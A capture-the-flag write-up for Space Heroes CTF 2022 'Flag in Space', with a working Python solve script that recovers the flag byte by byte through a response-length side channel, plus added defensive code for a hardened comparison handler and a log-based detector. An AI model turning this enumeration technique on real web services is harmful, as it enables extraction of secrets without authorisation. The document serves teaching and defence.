
Space Heroes CTF 2022: Flag in Space

TL;DR

  • The application processes the flag guess server-side, and its response reflects how much of the guess is correct.
  • Appending a null byte (\x00) gives a baseline response length for a guess with no further correct character.
  • Each correct character increases the response size.
  • Use response length as a side channel to brute-force the flag one byte at a time.
  • Repeat until the closing } is found.
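
To show the defect behind those bullets from the fixing side, here is an added model (not the challenge's code) of a handler that reflects the matched prefix, next to a hardened handler that compares the whole value in constant time and returns equal-length bodies. SECRET is a placeholder, not the real flag, and the reflected-prefix behaviour is an assumption about the challenge. length_leak is the check a reviewer would run against such an endpoint: sweep one character position and count how many distinct response lengths come back.

```python
import hmac
import string

# Placeholder secret for the demonstration, not the challenge flag.
SECRET = "shctf{example_flag}"


def vulnerable_response(guess: str) -> str:
    """Model of the behaviour the writeup exploits: the handler keeps the
    longest matching prefix of the guess and reflects it into the page, so the
    body grows by one byte for each correct character. Assumed behaviour, not
    the challenge's own code."""
    matched = ""
    for g, s in zip(guess, SECRET):
        if g != s:
            break
        matched += g
    return "<html><body>Checking: " + matched + "</body></html>"


def hardened_response(guess: str) -> str:
    """Fixed handler: compare the full value in constant time and answer with
    one of two equal-length bodies, so neither size nor timing depends on how
    much of the guess was right."""
    ok = hmac.compare_digest(guess.encode(), SECRET.encode())
    return "<html><body>correct</body></html>" if ok else "<html><body>wrong!!</body></html>"


def length_leak(handler, prefix: str, alphabet: str = string.printable) -> int:
    """Count the distinct response lengths seen when one character position is
    swept. 1 means the length carries no information; anything larger is the
    side channel the writeup uses."""
    return len({len(handler(prefix + c)) for c in alphabet})


if __name__ == "__main__":
    print("vulnerable:", length_leak(vulnerable_response, "shctf{"))  # 2
    print("hardened:  ", length_leak(hardened_response, "shctf{"))    # 1
```

The fix has two parts that both matter: the comparison must look at the whole value (no early exit on the first mismatch), and the two possible responses must not differ in size. Dropping either one brings a measurable channel back.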

Video Walkthrough

(Video: Space Heroes CTF 2022 Flag in Space web walkthrough showing blind response-length flag extraction)

Solution

from pwn import *
import requests
import string

context.log_level = 'debug'
url = 'http://172.105.154.14/?flag=shctf{'

# Baseline: a null byte cannot be a correct flag character, so this response
# length is what a guess with no extra correct character looks like
response = requests.get(url + '\x00')
correct_response = len(response.text)
info('initial response length: %d', correct_response)

# Loop until the closing brace of the flag has been found
while '}' not in url:
    # Candidate characters, in the order tried: braces, underscore, lowercase, digits
    for char in '{_}' + string.ascii_lowercase + string.digits:
        response = requests.get(url + char)
        # A longer response means one more character matched: keep it and move on
        if len(response.text) > correct_response:
            correct_response = len(response.text)
            url = url + char
            info(url)
            break
    else:
        # No candidate grew the response; stop rather than loop forever
        error('no candidate character increased the response length')

# Flag plz
warn(url)

Flag: shctf{2_explor3_fronti3r}
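
From the detection side, a script like the one above leaves a recognisable trail in the web server's access log: one client, one path, dozens of requests whose flag parameter is always a confirmed prefix plus one more byte. The following added script (not part of the writeup) parses combined-format log lines and raises an alert on that prefix-extension pattern. The log lines are constructed for the example: the IPs, timestamps and user agent are made up, the thresholds are assumptions, and the candidate order mirrors the solve script so the modelled traffic looks like it.

```python
import os
import re
import string
from collections import defaultdict
from urllib.parse import parse_qs, quote, urlsplit

# Combined log format: client, identity, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str):
    """Extract client IP, path and decoded query parameters from one log line
    (None if the line does not match the combined format)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "path": parts.path or "/",
        "params": parse_qs(parts.query, keep_blank_values=True),
    }


def detect_prefix_enumeration(lines, param="flag", min_distinct=20, min_ratio=0.9):
    """Alert on (client, path) pairs whose distinct values for `param` look like
    a byte-at-a-time search: nearly every value is a confirmed prefix plus one
    trailing byte. The confirmed prefix is the common prefix of the longest
    values (the position still being searched is excluded). Thresholds are
    assumptions for the example."""
    seen = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and param in rec["params"]:
            for value in rec["params"][param]:
                seen[(rec["ip"], rec["path"])].append(value)

    alerts = []
    for (ip, path), values in seen.items():
        distinct = set(values)
        if len(distinct) < min_distinct:
            continue
        longest_len = max(len(v) for v in distinct)
        spine = os.path.commonprefix([v for v in distinct if len(v) == longest_len])
        extending = sum(1 for v in distinct if spine.startswith(v[:-1]))
        ratio = extending / len(distinct)
        if ratio >= min_ratio:
            alerts.append({"ip": ip, "path": path, "requests": len(values),
                           "ratio": round(ratio, 2), "confirmed_prefix": spine})
    return alerts


# Same candidate order as the solve script, used to model its traffic.
CANDIDATES = "{_}" + string.ascii_lowercase + string.digits


def build_sample_log():
    """Constructed log lines: one client running the byte-at-a-time search for
    three positions after 'shctf{', plus unrelated traffic from a second client.
    IPs, timestamps and user agent are made up."""
    lines = []

    def entry(ip, target):
        n = len(lines)
        return (f'{ip} - - [01/Apr/2022:10:{n // 60:02d}:{n % 60:02d} +0000] '
                f'"GET {target} HTTP/1.1" 200 512 "-" "python-requests/2.27.1"')

    prefix = "shctf{"
    lines.append(entry("203.0.113.7", f"/?flag={quote(prefix)}%00"))  # baseline probe
    for wanted in "2_e":                      # characters the modelled search "finds"
        for c in CANDIDATES:
            lines.append(entry("203.0.113.7", f"/?flag={quote(prefix + c)}"))
            if c == wanted:
                prefix += c
                break
    for i in range(5):                        # benign client, few distinct values
        lines.append(entry("198.51.100.9", f"/?flag=shctf%7Bguess{i}%7D"))
    lines.append(entry("198.51.100.9", "/static/style.css"))
    return lines


if __name__ == "__main__":
    for alert in detect_prefix_enumeration(build_sample_log()):
        print(alert)
```

Keying on distinct values rather than raw request count keeps a client that retries the same guess from tripping the rule, and the confirmed_prefix field tells an incident responder how far the search had progressed when it was noticed. In a real deployment the same grouping would be done per time window rather than over the whole file.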